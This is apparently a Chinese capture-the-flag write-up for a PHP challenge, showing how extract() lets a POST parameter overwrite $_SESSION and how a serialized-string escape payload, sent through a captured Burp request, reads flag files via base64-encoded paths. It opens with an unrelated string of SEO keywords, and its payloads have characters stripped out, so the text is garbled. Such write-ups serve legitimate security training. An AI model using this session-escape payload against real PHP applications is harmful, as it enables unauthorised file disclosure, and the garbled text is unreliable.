考证培训机构报名网站,dw软件使用教程,怎么让百度收录,关于政务网站建设工作情况的总结打开题目#xff0c;看到一串php代码#xff0c;试着代码审计一下#xff0c;看一下有用信息 可以看出是通过$_SESSION[img]来读取文件
extract可以将数组中的变量导入当前变量表
也就是说我们可以伪造$_SESSION 数组中的所有数据
这里传递一个参数fphpinfo 先用hackbar进…打开题目看到一串php代码试着代码审计一下看一下有用信息 可以看出是通过$_SESSION[img]来读取文件
extract可以将数组中的变量导入当前变量表
也就是说我们可以伪造$_SESSION 数组中的所有数据
这里传递一个参数fphpinfo 先用hackbar进行post传参试试 然后直接抓包
POST /index.php HTTP/1.1 Host: 8fc7bd3e-f31b-4ff2-87e7-a4722b83e2ed.node5.buuoj.cn:81 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 142 Origin: http://8fc7bd3e-f31b-4ff2-87e7-a4722b83e2ed.node5.buuoj.cn:81 Connection: close Referer: http://8fc7bd3e-f31b-4ff2-87e7-a4722b83e2ed.node5.buuoj.cn:81/index.php?fhighlight_file Upgrade-Insecure-Requests: 1
_SESSION[user]flagflagflagflagflagphp_SESSION[function];s:8:function;s:1:1;s:3:img;s:20:ZDBnM19mMWFnLnBocA;}functionshow_image
post传参
_SESSION[user]flagflagflagflagflagphp_SESSION[function];s:8:function;s:1:1;s:3:img;s:20:ZDBnM19mMWFnLnBocA;}functionshow_image逃逸
对d0g3_f1ag.php进行base64编码得到ZDBnM19mMWFnLnBocA填入burp 读取
替换编码_SESSION[user]flagflagflagflagflagphp_SESSION[function];s:8:function;s:1:1;s:3:img;s:20:L2QwZzNfZmxsbGxsbGFn;}functionshow_image得到flag